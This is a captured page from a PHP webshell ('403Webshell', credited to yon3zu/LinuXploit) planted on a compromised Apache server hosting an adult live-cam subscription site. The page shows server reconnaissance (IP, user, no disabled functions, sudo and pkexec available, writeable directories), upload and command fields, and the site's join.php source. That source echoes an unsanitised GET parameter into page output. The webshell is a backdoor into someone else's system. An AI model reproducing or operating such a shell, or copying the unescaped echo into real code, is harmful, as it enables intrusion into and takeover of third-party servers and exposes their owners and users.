403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/erotiquetvlive.com/public_html/site/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/erotiquetvlive.com/public_html/site/join.php
<?php include('includes/includes.php'); ?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link href="css/custom.css" rel="stylesheet" type="text/css" />
<link href="css/media.css" rel="stylesheet" type="text/css" />
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,300,300italic,400italic,600,600italic,700,700italic,800,800italic' rel='stylesheet' type='text/css' />
<title>Erotique TV Live Daily Cam & Sex Shows</title>
</head>
<body>
<header class="header clear">
	<div class="container">
        <div class="logo"><a href="index.php"><img src="images/logo.png" alt=""></a></div>
        <div class="header-thum clear">
            <ul>
				<img src="images/vnaLive-logo.png" alt=""><br />
            </ul>
        </div>
        <div class="header-point">
            <ul>
				<li>ErotiqueTV Live's Next Exclusive Show: </li>
				<iframe src="https://vettenationlive.com/schedule.php?type=countdown_banner&model=erotiquetv"></iframe>
            </ul>
        </div>
        <div class="header-login">
			<a class="member-login" href="https://members.erotiquetvlive.com/members/">members login</a>
			<a class="get-password" href="https://bill.ccbill.com/jpost/signup.cgi?clientAccnum=937375&clientSubacc=0014&formName=201cc&language=English&allowedTypes=0000002868:840,0000000565:840,0000000106:840,0000000035:840&subscriptionTypeId=0000002868:840&natsxsell=XYRB2B9fD1Ka">Join Instantly!</a>
        </div>
    </div>
</header>
<section class="main-container">
	<div class="container">
    	<div class="join-sec clear">
            <?php
            if(isset($_GET['video'])) { $video_id = $_GET['video']; }
            else {
				$random_video = rand( 1, countFolderContents() );
				//fix missing '0'
				if( $random_video < 10 ) { $random_video = '00'.$random_video; }
				if( $random_video >= 10 && $random_video < 100 ) { $random_video = '0'.$random_video; }
				$video_id = $random_video;
			}             
        ?>
        	
            <div class="video-box">
            	<div class="player-box"><img class="large-video" src="<?php echo THUMBS_FOLDER.$video_id.'.jpg'; ?>" alt=""></div>
                <div class="member-popup clear">
                	<div class="lock">
                    	<img src="images/lock-icon.png" alt="">
                    </div>
                    <div class="member-btn">
                    	<img src="images/member-only.png" alt="">
                        <div class="create-btn">
                        	<a href="https://bill.ccbill.com/jpost/signup.cgi?clientAccnum=937375&clientSubacc=0014&formName=201cc&language=English&allowedTypes=0000002868:840,0000000565:840,0000000106:840,0000000035:840&subscriptionTypeId=0000002868:840&natsxsell=XYRB2B9fD1Ka"><img src="images/create-account.png" alt=""></a>
                        </div>
                    </div>
                </div>
            </div>

            <div class="why-join">
            	<h2 class="join-title">why join erotique tv live?</h2>
                <ul>
                	<li>Live web cam shows every single day</li>
                    <li>Exclusive 90 minute 2 camera shows</li>
                    <li>Eric John personal shows all live</li>
                    <li>The Top Porn Stars in the business</li>
                    <li>Endless live cams for our members</li>
                    <li>Archived live shows all in 1080 HD</li>
                    <li>No limits! Watch shows all day long</li>
                    <li>Chat with your favorite porn stars</li>
                    <li>Make requests & interact with girls</li>
                    <li>Chat with Eric and Heather Live</li>
                    <li>iPhone, Tablet & Android compatible</li>
                </ul>
            </div>
            <div class="account-step">
            	<div class="step-1">
                	<b><u><center>LIVE SHOW CALENDAR</u></b><br /><iframe src="https://www.vettenationlive.com/shows/calendar/countdown" width="400" height="100" frameborder="0" scrolling="no"></iframe></center>
                </div>
            </div>
		<h2>$4.95 Gets You Access<br />To Watch All Live Shows</h2>
			<br /><a href="https://bill.ccbill.com/jpost/signup.cgi?clientAccnum=937375&clientSubacc=0014&formName=201cc&language=English&allowedTypes=0000002868:840,0000000565:840,0000000106:840,0000000035:840&subscriptionTypeId=0000002868:840&natsxsell=XYRB2B9fD1Ka"><img src="https://www.erotiquetvlive.com/images/joincredit.jpg"></a>
			<br /><a href="https://bill.ccbill.com/jpost/signup.cgi?clientAccnum=937375&clientSubacc=0014&formName=201ck&language=English&allowedCurrencies=840&allowedTypes=0000002868:840,0000000106:840,0000000035:840&subscriptionTypeId=0000002868:840&natsxsell=XYRB2B9fD1Ka"><img src="https://www.erotiquetvlive.com/images/joincheck.jpg"></a>
			<p align="right"><a href="https://join.erotiquetvlive.com/signup/signup.php"><font color=#FFFFFF size=3>Or Pay with PayPal: </font><img src="images/PP_image.png"></a>&nbsp;&nbsp;&nbsp;&nbsp;</p>
        </div>
    </div>
</section>

<center><br /><br />		<div class="password-btn">
			<a href="https://bill.ccbill.com/jpost/signup.cgi?clientAccnum=937375&clientSubacc=0014&formName=201cc&language=English&allowedTypes=0000002868:840,0000000565:840,0000000106:840,0000000035:840&subscriptionTypeId=0000002868:840&natsxsell=XYRB2B9fD1Ka">Watch&nbsp;&nbsp;&nbsp;The&nbsp;&nbsp;&nbsp;Live&nbsp;&nbsp;&nbsp;Shows&nbsp;&nbsp;&nbsp;Now</a>
		</div>

<footer class="footer">
	<div class="container">
    	<div class="footer-copy">
			<p><a href="http://www.epoch.com/">Epoch</a> and <a href="https://cs.segpay.com/">SegPay</a> are Our Authorizes Sales Agents, <a href="https://www.ccbill.com/">CCBill Support/Cancels</a> | <a href="https://erotiquetvlive.com/terms.html">Terms</a> | <a href="https://erotiquetvlive.com/privacy.html">Privacy Policy</a><br/><a href="https://erotiquetvlive.com/2257.html">18 U.S.C. 2257 Record-Keeping Requirements Compliance Statement</a><br />
		<br />Copyright &copy; 2018 ErotiqueTVLive.com & Erotique Entertainment Inc & Darkreach Communications International LLC</p>
        </div>
    </div>
</footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit